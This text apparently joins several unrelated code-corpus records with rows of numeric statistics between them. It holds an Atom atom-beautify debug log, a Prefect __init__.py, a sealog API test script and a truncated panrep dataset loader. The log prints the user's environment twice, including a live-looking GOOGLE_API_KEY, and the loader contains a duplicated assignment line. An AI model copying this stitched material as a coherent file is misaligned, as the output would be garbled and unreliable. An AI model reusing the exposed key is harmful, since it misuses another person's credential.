2017-07-23T12:31:35.467Z - debug: [] spawn done -4058
2017-07-23T12:31:35.501Z - debug: [] exePath: docker
2017-07-23T12:31:35.501Z - debug: [] env: ALLUSERSPROFILE=C:\ProgramData, APPDATA=C:\Users\xyz_MG\AppData\Roaming, ATOM_HOME=C:\Users\xyz_MG\.atom, CommonProgramFiles=C:\Program Files\Common Files, CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files, CommonProgramW6432=C:\Program Files\Common Files, COMPUTERNAME=DESKTOP-U4L73CS, ComSpec=C:\Windows\system32\cmd.exe, FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer, FPS_BROWSER_USER_PROFILE_STRING=Default, GOOGLE_API_KEY=AIzaSyAQfxPJiounkhOjODEO5ZieffeBv6yft2Q, HOMEDRIVE=C:, HOMEPATH=\Users\xyz_MG, LOCALAPPDATA=C:\Users\xyz_MG\AppData\Local, LOGONSERVER=\\DESKTOP-U4L73CS, NODE_ENV=production, NODE_PATH=C:\Users\xyz_MG\AppData\Local\atom\app-1.14.3\resources\app.asar\exports, NUMBER_OF_PROCESSORS=4, OneDrive=C:\Users\xyz_MG\OneDrive, OS=Windows_NT, Path=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin, PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, PROCESSOR_ARCHITECTURE=AMD64, PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel, PROCESSOR_LEVEL=6, PROCESSOR_REVISION=3d04, ProgramData=C:\ProgramData, ProgramFiles=C:\Program Files, ProgramFiles(x86)=C:\Program Files (x86), ProgramW6432=C:\Program Files, PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules, PUBLIC=C:\Users\Public, SESSIONNAME=Console, SynaProgDir=Synaptics\SynTP, SystemDrive=C:, SystemRoot=C:\Windows, TEMP=C:\Users\xyz_MG\AppData\Local\Temp, TMP=C:\Users\xyz_MG\AppData\Local\Temp, USERDOMAIN=DESKTOP-U4L73CS, USERDOMAIN_ROAMINGPROFILE=DESKTOP-U4L73CS, USERNAME=xyz_MG, USERPROFILE=C:\Users\xyz_MG, windir=C:\Windows
2017-07-23T12:31:35.501Z - debug: [] PATH: C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin
2017-07-23T12:31:35.501Z - debug: [] args 0=--version
2017-07-23T12:31:35.501Z - debug: [] relativized args 0=--version
2017-07-23T12:31:35.502Z - debug: [] spawnOptions cwd=C:\Users\xyz_MG\AppData\Local\Temp, ALLUSERSPROFILE=C:\ProgramData, APPDATA=C:\Users\xyz_MG\AppData\Roaming, ATOM_HOME=C:\Users\xyz_MG\.atom, CommonProgramFiles=C:\Program Files\Common Files, CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files, CommonProgramW6432=C:\Program Files\Common Files, COMPUTERNAME=DESKTOP-U4L73CS, ComSpec=C:\Windows\system32\cmd.exe, FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer, FPS_BROWSER_USER_PROFILE_STRING=Default, GOOGLE_API_KEY=AIzaSyAQfxPJiounkhOjODEO5ZieffeBv6yft2Q, HOMEDRIVE=C:, HOMEPATH=\Users\xyz_MG, LOCALAPPDATA=C:\Users\xyz_MG\AppData\Local, LOGONSERVER=\\DESKTOP-U4L73CS, NODE_ENV=production, NODE_PATH=C:\Users\xyz_MG\AppData\Local\atom\app-1.14.3\resources\app.asar\exports, NUMBER_OF_PROCESSORS=4, OneDrive=C:\Users\xyz_MG\OneDrive, OS=Windows_NT, Path=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin, PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, PROCESSOR_ARCHITECTURE=AMD64, PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel, PROCESSOR_LEVEL=6, PROCESSOR_REVISION=3d04, ProgramData=C:\ProgramData, ProgramFiles=C:\Program Files, ProgramFiles(x86)=C:\Program Files (x86), ProgramW6432=C:\Program Files, PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules, PUBLIC=C:\Users\Public, SESSIONNAME=Console, SynaProgDir=Synaptics\SynTP, SystemDrive=C:, SystemRoot=C:\Windows, TEMP=C:\Users\xyz_MG\AppData\Local\Temp, TMP=C:\Users\xyz_MG\AppData\Local\Temp, USERDOMAIN=DESKTOP-U4L73CS, USERDOMAIN_ROAMINGPROFILE=DESKTOP-U4L73CS, USERNAME=xyz_MG, USERPROFILE=C:\Users\xyz_MG, windir=C:\Windows
2017-07-23T12:31:35.502Z - debug: [] spawn docker 0=--version
2017-07-23T12:31:35.506Z - debug: [] error Error: spawn docker ENOENT
at exports._errnoException (util.js:1026:11)
at Process.ChildProcess._handle.onexit (internal/child_process.js:193:32)
at onErrorNT (internal/child_process.js:359:16)
at _combinedTickCallback (internal/process/next_tick.js:74:11)
at process._tickCallback (internal/process/next_tick.js:98:9)
2017-07-23T12:31:35.506Z - debug: [] error Error: spawn docker ENOENT
at exports._errnoException (util.js:1026:11)
at Process.ChildProcess._handle.onexit (internal/child_process.js:193:32)
at onErrorNT (internal/child_process.js:359:16)
at _combinedTickCallback (internal/process/next_tick.js:74:11)
at process._tickCallback (internal/process/next_tick.js:98:9)
2017-07-23T12:31:35.507Z - debug: [] Error: Could not find 'docker'. The program may not be installed.
at Function.Executable.commandNotFoundError (file:///C:/Users/xyz_MG/.atom/packages/atom-beautify/src/beautifiers/executable.coffee:276:14)
at Executable.commandNotFoundError (file:///C:/Users/xyz_MG/.atom/packages/atom-beautify/src/beautifiers/executable.coffee:268:18)
at file:///C:/Users/xyz_MG/.atom/packages/atom-beautify/src/beautifiers/executable.coffee:196:22
at tryCatcher (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\util.js:16:23)
at Promise._settlePromiseFromHandler (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:512:31)
at Promise._settlePromise (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:569:18)
at Promise._settlePromise0 (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:614:10)
at Promise._settlePromises (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:689:18)
at Async._drainQueue (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\async.js:133:16)
at Async._drainQueues (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\async.js:143:10)
at Async.drainQueues (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\async.js:17:14)
at process._tickCallback (internal/process/next_tick.js:103:7)
2017-07-23T12:31:35.520Z - debug: [beautifiers\beautifier.coffee] Error loading executables Error: Could not find 'autopep8'. The program may not be installed.
at Function.Executable.commandNotFoundError (file:///C:/Users/xyz_MG/.atom/packages/atom-beautify/src/beautifiers/executable.coffee:276:14)
at HybridExecutable.Executable.commandNotFoundError (file:///C:/Users/xyz_MG/.atom/packages/atom-beautify/src/beautifiers/executable.coffee:268:18)
at file:///C:/Users/xyz_MG/.atom/packages/atom-beautify/src/beautifiers/executable.coffee:196:22
at tryCatcher (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\util.js:16:23)
at Promise._settlePromiseFromHandler (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:512:31)
at Promise._settlePromise (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:569:18)
at Promise._settlePromise0 (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:614:10)
at Promise._settlePromises (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:689:18)
at Async._drainQueue (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\async.js:133:16)
at Async._drainQueues (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\async.js:143:10)
at Async.drainQueues (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\async.js:17:14)
at process._tickCallback (internal/process/next_tick.js:103:7)
2017-07-23T12:31:35.522Z - error: [beautifiers\index.coffee] Error: Could not find 'autopep8'. The program may not be installed.
at Function.Executable.commandNotFoundError (file:///C:/Users/xyz_MG/.atom/packages/atom-beautify/src/beautifiers/executable.coffee:276:14)
at HybridExecutable.Executable.commandNotFoundError (file:///C:/Users/xyz_MG/.atom/packages/atom-beautify/src/beautifiers/executable.coffee:268:18)
at file:///C:/Users/xyz_MG/.atom/packages/atom-beautify/src/beautifiers/executable.coffee:196:22
at tryCatcher (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\util.js:16:23)
at Promise._settlePromiseFromHandler (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:512:31)
at Promise._settlePromise (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:569:18)
at Promise._settlePromise0 (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:614:10)
at Promise._settlePromises (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\promise.js:689:18)
at Async._drainQueue (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\async.js:133:16)
at Async._drainQueues (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\async.js:143:10)
at Async.drainQueues (C:\Users\xyz_MG\.atom\packages\atom-beautify\node_modules\bluebird\js\release\async.js:17:14)
at process._tickCallback (internal/process/next_tick.js:103:7)
2017-07-23T12:31:35.523Z - info: [beautifiers\index.coffee] Analytics is enabled.
```
| 50.928056 | 15,968 | 0.652473 | 21,754 | 183,341 | 5.241519 | 0.031351 | 0.040518 | 0.08086 | 0.12129 | 0.976277 | 0.974909 | 0.974111 | 0.970462 | 0.969182 | 0.965928 | 0 | 0.027768 | 0.219602 | 183,341 | 3,599 | 15,969 | 50.942206 | 0.769162 | 0 | 0 | 0.872917 | 1 | 0.026264 | 0.141841 | 0.01701 | 0 | 0 | 0 | 0 | 0.000565 | 0 | null | null | 0 | 0.006778 | null | null | 0.002259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
deadd8afe12d0a6d3a92b574a4437db21adf5045 | 275 | py | Python | src/prefect/backend/__init__.py | concreted/prefect | dd732f5990ee2b0f3d816adb285168fd63b239e4 | [
"Apache-2.0"
] | 2 | 2021-10-07T19:58:34.000Z | 2021-11-09T10:46:58.000Z | src/prefect/backend/__init__.py | concreted/prefect | dd732f5990ee2b0f3d816adb285168fd63b239e4 | [
"Apache-2.0"
] | 15 | 2021-12-18T09:11:34.000Z | 2022-03-31T03:37:15.000Z | src/prefect/backend/__init__.py | concreted/prefect | dd732f5990ee2b0f3d816adb285168fd63b239e4 | [
"Apache-2.0"
] | 1 | 2021-11-30T05:49:13.000Z | 2021-11-30T05:49:13.000Z | from prefect.backend.task_run import TaskRunView
from prefect.backend.flow_run import FlowRunView
from prefect.backend.flow import FlowView
from prefect.backend.tenant import TenantView
from prefect.backend.kv_store import set_key_value, get_key_value, delete_key, list_keys
| 45.833333 | 88 | 0.869091 | 42 | 275 | 5.47619 | 0.5 | 0.23913 | 0.391304 | 0.191304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083636 | 275 | 5 | 89 | 55 | 0.912698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
dec56ad3185ea7d11728ae958a56f6af4f4bf2bc | 6,343 | py | Python | misc/test_python_sealog.py | WHOIGit/ndsf-sealog-server | e57843e3e23a924ccf6fc1ef1e40d92f36a3b612 | [
"MIT"
] | 4 | 2019-10-29T21:53:13.000Z | 2021-12-02T00:38:42.000Z | misc/test_python_sealog.py | WHOIGit/ndsf-sealog-server | e57843e3e23a924ccf6fc1ef1e40d92f36a3b612 | [
"MIT"
] | 14 | 2020-05-28T16:39:30.000Z | 2021-05-22T06:01:40.000Z | misc/test_python_sealog.py | WHOIGit/ndsf-sealog-server | e57843e3e23a924ccf6fc1ef1e40d92f36a3b612 | [
"MIT"
] | 1 | 2020-01-31T00:00:42.000Z | 2020-01-31T00:00:42.000Z | #!/usr/bin/env python3
'''
FILE: test_python_sealog.py
DESCRIPTION: This script attempts to test all the functions in the
python_sealog wrapper. For this to pass the server must be run
in devel mode, i.e. npm run start-devel
BUGS:
NOTES:
AUTHOR: Webb Pinner
COMPANY: OceanDataTools.org
VERSION: 0.2
CREATED: 2021-04-21
REVISION: 2021-04-27
LICENSE INFO: This code is licensed under MIT license (see LICENSE.txt for details)
Copyright (C) OceanDataTools.org 2021
'''
from python_sealog.cruises import get_cruises, get_cruise, get_cruise_uid_by_id, get_cruise_by_id, get_cruise_by_lowering, get_cruise_by_event
from python_sealog.lowerings import get_lowerings, get_lowering, get_lowering_uid_by_id, get_lowering_by_id, get_lowerings_by_cruise, get_lowering_uids_by_cruise, get_lowering_ids_by_cruise, get_lowering_by_event
from python_sealog.events import get_event, get_events_by_cruise, get_events_by_lowering
CRUISE_UID = '5981f167212b348aed7fa9f5'
CRUISE_ID = 'AT37-13'
LOWERING_UID = '6981f167212b348aed7fa9f5'
LOWERING_ID = '4928'
EVENT_UID = '5981f167212b348aed7fa9f5'
EVENT_FILTER = 'FISH'
print("Cruises")
print("get_cruises() ", end='')
if get_cruises() is not None:
print('PASS')
else:
print('FAIL')
print("get_cruises(export_format='csv') ", end='')
if get_cruises(export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_cruise(CRUISE_UID) ", end='')
if get_cruise(CRUISE_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_cruise(CRUISE_UID, export_format='csv') ", end='')
if get_cruise(CRUISE_UID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_cruise_uid_by_id(CRUISE_ID) ", end='')
if get_cruise_uid_by_id(CRUISE_ID) is not None:
print('PASS')
else:
print('FAIL')
print("get_cruise_by_id(CRUISE_ID) ", end='')
if get_cruise_by_id(CRUISE_ID) is not None:
print('PASS')
else:
print('FAIL')
print("get_cruise_by_id(CRUISE_ID, export_format='csv') ", end='')
if get_cruise_by_id(CRUISE_ID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_cruise_by_lowering(LOWERING_UID) ", end='')
if get_cruise_by_lowering(LOWERING_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_cruise_by_lowering(LOWERING_UID, export_format='csv') ", end='')
if get_cruise_by_lowering(LOWERING_UID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_cruise_by_event(EVENT_UID) ", end='')
if get_cruise_by_event(EVENT_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_cruise_by_event(EVENT_UID, export_format='csv') ", end='')
if get_cruise_by_event(EVENT_UID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print()
print("Lowerings")
print("get_lowerings() ", end='')
if get_lowerings() is not None:
print('PASS')
else:
print('FAIL')
print("get_lowerings(export_format='csv') ", end='')
if get_lowerings(export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_lowering_uid_by_id(LOWERING_ID) ", end='')
if get_lowering_uid_by_id(LOWERING_ID) is not None:
print('PASS')
else:
print('FAIL')
print("get_lowering_uids_by_cruise(CRUISE_UID) ", end='')
if get_lowering_uids_by_cruise(CRUISE_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_lowering_ids_by_cruise(CRUISE_UID) ", end='')
if get_lowering_ids_by_cruise(CRUISE_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_lowering(LOWERING_UID) ", end='')
if get_lowering(LOWERING_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_lowering(LOWERING_UID, export_format='csv') ", end='')
if get_lowering(LOWERING_UID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_lowering_by_id(LOWERING_ID) ", end='')
if get_lowering_by_id(LOWERING_ID) is not None:
print('PASS')
else:
print('FAIL')
print("get_lowering_by_id(LOWERING_ID, export_format='csv') ", end='')
if get_lowering_by_id(LOWERING_ID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_lowerings_by_cruise(CRUISE_UID) ", end='')
if get_lowerings_by_cruise(CRUISE_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_lowerings_by_cruise(CRUISE_UID, export_format='csv') ", end='')
if get_lowerings_by_cruise(CRUISE_UID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_lowering_by_event(EVENT_UID) ", end='')
if get_lowering_by_event(EVENT_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_lowering_by_event(EVENT_UID, export_format='csv') ", end='')
if get_lowering_by_event(EVENT_UID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print()
print("Events")
print("get_event(EVENT_UID) ", end='')
if get_event(EVENT_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_event(EVENT_UID, export_format='csv') ", end='')
if get_event(EVENT_UID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_events_by_cruise(CRUISE_UID) ", end='')
if get_events_by_cruise(CRUISE_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_events_by_cruise(CRUISE_UID, export_format='csv') ", end='')
if get_events_by_cruise(CRUISE_UID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_events_by_cruise(CRUISE_UID, export_format='csv', event_filter=EVENT_FILTER) ", end='')
if get_events_by_cruise(CRUISE_UID, export_format='csv', event_filter=EVENT_FILTER) is not None:
print('PASS')
else:
print('FAIL')
print("get_events_by_lowering(LOWERING_UID) ", end='')
if get_events_by_lowering(LOWERING_UID) is not None:
print('PASS')
else:
print('FAIL')
print("get_events_by_lowering(LOWERING_UID, export_format='csv') ", end='')
if get_events_by_lowering(LOWERING_UID, export_format='csv') is not None:
print('PASS')
else:
print('FAIL')
print("get_events_by_lowering(LOWERING_UID, export_format='csv', event_filter=EVENT_FILTER) ", end='')
if get_events_by_lowering(LOWERING_UID, export_format='csv', event_filter=EVENT_FILTER) is not None:
print('PASS')
else:
print('FAIL')
| 28.572072 | 212 | 0.719218 | 977 | 6,343 | 4.351075 | 0.093142 | 0.060221 | 0.060221 | 0.105387 | 0.812279 | 0.772054 | 0.757939 | 0.744295 | 0.685251 | 0.642202 | 0 | 0.014413 | 0.135898 | 6,343 | 221 | 213 | 28.701357 | 0.761175 | 0.084818 | 0 | 0.563218 | 0 | 0 | 0.298085 | 0.175091 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.183908 | 0.017241 | 0 | 0.017241 | 0.58046 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 7 |
def1276c93ce4c40d504ce9040ecef538396c474 | 111,923 | py | Python | panrep/load_data.py | amazon-research/panrep | 57e6f71bb70c0908f3db28be97af0d818a863e19 | [
"Apache-2.0"
] | 10 | 2020-12-18T22:53:43.000Z | 2021-12-13T19:07:25.000Z | panrep/load_data.py | amazon-research/panrep | 57e6f71bb70c0908f3db28be97af0d818a863e19 | [
"Apache-2.0"
] | null | null | null | panrep/load_data.py | amazon-research/panrep | 57e6f71bb70c0908f3db28be97af0d818a863e19 | [
"Apache-2.0"
] | 1 | 2021-10-30T12:33:55.000Z | 2021-10-30T12:33:55.000Z | '''
This file contains functions that help loading the different datasets in the required format.
'''
import os
import pickle
import random
import dgl.function as fn
# from iterstrat.ml_stratifiers import MultilabelStratifiedShuffleSplit
import dgl
import scipy.io
import urllib.request
import numpy as np
from dgl.data.rdf import AIFBDataset, MUTAGDataset, BGSDataset, AMDataset
import torch
#from aux_files.DistDGL.DistDGL.python.dgl.data import OAGDataset
from dgl.contrib.data import load_data
from sklearn.model_selection import StratifiedShuffleSplit,train_test_split
from statistics import median
from scipy.cluster.vq import vq, kmeans2, whiten
import pandas as pd
import pandas as pd
from ogb.nodeproppred import DglNodePropPredDataset
def compute_cluster_assignemnts(features,cluster_number):
centroid, label = kmeans2(features,cluster_number,minit='points')
one_hot=pd.get_dummies(label)
return torch.tensor(one_hot.values).float()
def generate_rwalks(g,metapaths,samples_per_node=20,device=None,rw_supervision=True):
rw_neighbors={}
if not rw_supervision:
return None
for ntype in metapaths.keys():
if ntype in g.ntypes:
traces,types=dgl.sampling.random_walk(g, list(np.arange(g.number_of_nodes(ntype)))* samples_per_node, metapath = metapaths[ntype])
# remove the same node id as the start of the walk!!
traces=traces[:,1:]
types=types[1:]
sampled_ntypes=list(types.numpy())*samples_per_node
rw_neighbors_ids=traces.reshape((g.number_of_nodes(ntype),samples_per_node*traces.shape[1]))
rw_neighbors[ntype]=(rw_neighbors_ids,sampled_ntypes)
neighbors = rw_neighbors[ntype][0]
neighbor_per_ntype = {}
for id in range(len(rw_neighbors[ntype][1])):
neighbor_type = g.ntypes[rw_neighbors[ntype][1][id]]
if neighbor_type in neighbor_per_ntype:
neighbor_per_ntype[neighbor_type] = torch.cat(
(neighbor_per_ntype[neighbor_type], neighbors[:, id].unsqueeze(0).transpose(1, 0).to(device)), dim=1)
else:
neighbor_per_ntype[neighbor_type] = neighbors[:, id].unsqueeze(0).transpose(1, 0).to(device)
rw_neighbors[ntype]=neighbor_per_ntype
return rw_neighbors
def load_hetero_data(args):
if args.dataset == "kaggle_shoppers":
train_idx,test_idx,val_idx,labels,g,category,num_classes,masked_node_types= load_kaggle_shoppers_data(args)
elif args.dataset == "wn18":
train_idx,test_idx,val_idx,labels,g,category,num_classes,masked_node_types= load_wn_data(args)
elif args.dataset == "imdb":
train_idx,test_idx,val_idx,labels,g,category,num_classes,masked_node_types= load_imdb_data(args)
elif args.dataset == "imdb_preprocessed":
train_idx,test_idx,val_idx,labels,G,category,num_classes,featless_node_types,rw_neighbors= load_imdb_preprocessed_data(args)
elif args.dataset == "dblp_preprocessed":
train_idx,test_idx,val_idx,labels,G,category,num_classes,featless_node_types,rw_neighbors= load_dblp_preprocessed_data(
args)
elif args.dataset == "imdb_pre_xiang":
train_idx, test_idx, val_idx, labels, g, category, num_classes, masked_node_types = load_imdb_prexiang_preprocessed_data(
args)
else:
raise NotImplementedError
return train_idx,test_idx,val_idx,labels,G,category,num_classes,featless_node_types,rw_neighbors
def load_univ_hetero_data(args):
multilabel=False
if args.dataset == "imdb_preprocessed":
train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,rw_neighbors,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g= load_imdb_univ_preprocessed_data(args)
elif args.dataset == "acm":
train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g = load_acm_univ_data(args)
elif args.dataset == 'aifb' or args.dataset == 'mutag' or args.dataset == 'bgs' or args.dataset == 'am':
train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g = load_std_het_full_univ_data(args)
elif args.dataset == "oag_full":
train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g = load_oag_full_univ_data(args)
elif args.dataset == 'ogbn-mag':
train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g = load_ogbn_mag_full_univ_data(args)
elif args.dataset == "oag":
train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g = load_oag_univ_preprocessed_data(args)
elif args.dataset == "oag_na":
train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g = load_oag_na_univ_preprocessed_data(args)
elif args.dataset == "dblp_preprocessed":
train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g =load_dblp_univ_preprocessed_data(args)
elif args.dataset == "query_biodata":
train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g=load_query_biodata_univ_data(args)
train_edges, test_edges, valid_edges, train_g, valid_g, test_g=load_query_biodata_univ_data(args)
elif args.dataset == "drkg":
train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g=load_drkg_edge_few_shot_data(args)
else:
raise NotImplementedError
if not args.use_node_features:
for ntype in train_g.srctypes:
if train_g.srcnodes[ntype].data.get('h_f', None) is not None:
del train_g.srcnodes[ntype].data['h_f']
if test_g.srcnodes[ntype].data.get('h_f', None) is not None:
del test_g.srcnodes[ntype].data['h_f']
if valid_g.srcnodes[ntype].data.get('h_f', None) is not None:
del valid_g.srcnodes[ntype].data['h_f']
for ntype in train_g.dsttypes:
if train_g.dstnodes[ntype].data.get('h_f', None) is not None:
del train_g.dstnodes[ntype].data['h_f']
if test_g.srcnodes[ntype].data.get('h_f', None) is not None:
del test_g.dstnodes[ntype].data['h_f']
if valid_g.srcnodes[ntype].data.get('h_f', None) is not None:
del valid_g.dstnodes[ntype].data['h_f']
if labels is not None and len(labels.shape)>1:
zero_rows=np.where(~(labels).cpu().numpy().any(axis=1))[0]
train_idx=np.array(list(set(train_idx).difference(set(zero_rows))))
val_idx = np.array(list(set(val_idx).difference(set(zero_rows))))
test_idx = np.array(list(set(test_idx).difference(set(zero_rows))))
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,rw_neighbors,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g,multilabel
def hetero_data_to_homo_data(train_idx, test_idx, val_idx, labels, category, num_classes,
featless_node_types, rw_neighbors,
train_edges, test_edges, valid_edges, train_gh, valid_g, test_g):
category_id = len(train_gh.ntypes)
for i, ntype in enumerate(train_gh.ntypes):
if ntype == category:
category_id = i
train_g = dgl.to_homogeneous(train_gh)
node_ids = torch.arange(train_g.number_of_nodes())
node_tids = train_g.ndata[dgl.NTYPE]
loc = (node_tids == category_id)
target_idx = node_ids[loc]
return train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_few_edge_shot_hetero_data(args):
if args.dataset == "imdb_preprocessed":
train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,rw_neighbors,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g= load_imdb_univ_preprocessed_data(args)
elif args.dataset == "dblp_preprocessed":
train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,rw_neighbors,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g= load_dblp_univ_preprocessed_data(args)
elif args.dataset=='drkg':
train_idx, test_idx, val_idx, labels, category, num_classes, featless_node_types, rw_neighbors, \
train_edges, test_edges, valid_edges, train_g, valid_g, test_g = load_drkg_edge_few_shot_data(args)
else:
raise NotImplementedError
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,rw_neighbors,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_oag_nc_lp(args):
dir='../data/oaggpt/oag_NN.dgl'
dataset = dgl.load_graphs(dir)[0]
hg = dataset[0]
# Construct author embeddings by averaging over their papers' embeddings.
hg.multi_update_all(
{'rev_AP_write_first': (fn.copy_src('emb', 'm'), fn.sum('m', 'h')),
'rev_AP_write_last': (fn.copy_src('emb', 'm'), fn.sum('m', 'h')),
'rev_AP_write_other': (fn.copy_src('emb', 'm'), fn.sum('m', 'h')),},
'sum')
cnts = hg.in_degrees(etype='rev_AP_write_first') + hg.in_degrees(etype='rev_AP_write_last') + hg.in_degrees(etype='rev_AP_write_other')
cnts = cnts.reshape(-1, 1)
